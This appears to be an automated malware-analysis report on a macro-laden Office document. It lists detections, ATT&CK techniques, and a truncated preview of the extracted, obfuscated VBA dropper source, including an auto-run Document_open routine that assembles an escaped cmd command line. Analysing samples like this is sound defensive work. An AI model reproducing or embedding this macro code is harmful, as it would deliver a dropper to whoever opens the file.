MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an Office document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6619788-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6615425-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6615425-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29875 bytes |
SHA-256: 99ee620906b3e4c2b72526289acefe9aefb744556ccc86c97a39dd26d08e87db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EjzKQdfowBwasX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwZwfjA()
tsGwj = (58626 / VkpEh / JlcoVl / jNNEzT / jbOrr * 3830 * UiwRC * VijiU / uzOui - OVdji)
QoXzKD = (11806 / tuhWd / ABiuI / ZiBXE / wirEBG * 89993 * JlTsvT * bUwWj / aYzwo - XPimAs)
FZnRQ = (81310 / akDiBG / WNwjB / MhCHR / jhhdG * 97500 * izlXs * QObFOl / szUTYG - IzXXjA)
bhptb = (53651 / OPiqzp / zNFBYh / FuHNP / UbwSz * 46111 * wtfDu * LLJOG / CpRUhz - qjVnh)
End Function
Function PntWwMffo()
UphYzI = (60369 / NJzzjE / zWYFzp / CzPZc / OMnCZ * 20022 * EXqjYV * rwFBH / JMjjT - DPnhIY)
XSkFCd = (67978 / aYQVhf / djdoEw / llhlN / HtPKLQ * 21634 * iQaCvR * rzSLq / jzBAw - CjwXRQ)
kBVvZ = (42172 / ubfsj / PMDuOR / zBjDi / HdQqiI * 85477 * pqcJbl * OkArm / nCjnu - cXiVS)
zPoJLs = (11430 / AjoJOv / dEYSj / sElBm / NKKCQM * 10478 * ZPubT * MtEPd / AXFHDA - cHLCHY)
hJFJRU = (76018 / PClIiw / mOZWOY / NJNhIL / sImspo * 66472 * IuWikj * OpEEmM / suoDn - vvjMbT)
End Function
Private Sub Document_open()
On Error Resume Next
OqwwH = 94517 / GcLXqi * QANSSm / WnNdD * OIpTf + 65638
jRSfb = 32271 / hIaiq * ziUwGa / vwvvsN * FHtRtX + 93955
cGfdq = 9951 / OJPWut * pYQZr / GUQJo * qNaDOZ + 26957
lrIOB = 5799 / OBaMk * Frfpzo / uRbwZ * MMnzL + 73680
poEuprYaMjD = Application.Run("uCqKMmUvRpQDut", "" + JinwTpS + zWYcRjEiftrDj + CVar("c") + XOznrsI + LqiiUSjDFXj + waafif + crYwDLO + NSjNrTAszOr + UXBvWO + zwtLab + RFDrazhsVOK + wztwhTdzDH + SzWYS + DjCuhaj + rzqaRdIhW + FBPKDnZRR + AdoJbwiJIUS + bLBwq + zwpoXnHsNVX + AMHjRjHLcfQz + hluwPHqVo)
sBKjzb = 32062 / rdTmp * tloiXY / cjYRPz * ItfJn + 35604
cnFAw = 62145 / jDXDSH * aNEhJ / qpLWcf * pWuiY + 16725
End Sub
Function BKzZWTtJsbAcJq()
PRuIma = 45094 / LUvws * tvSEZ / zmHbX * wdSLwL + 73245
uhwYuq = 72698 / nPVZWa * lTTZok / PHviE * ELfXw + 59437
pmjAt = 354 / EnuPjh * phwNK / cKSkwd * DAYkMj + 96921
wCQRmO = 68982 / DKwzKz * GhrmU / wQIqO * nwkzC + 73706
iDfNU = 66402 / hHJOY * dwwbPi / TwDPGZ * PKDzj + 1633
End Function
Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + " ;" + " /^F " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + " " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns= " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + " ," + " %^" + "x ; " + " , In " + ", ( ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + " ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r " + ", ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " , " + "%" + "^x" + ", ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.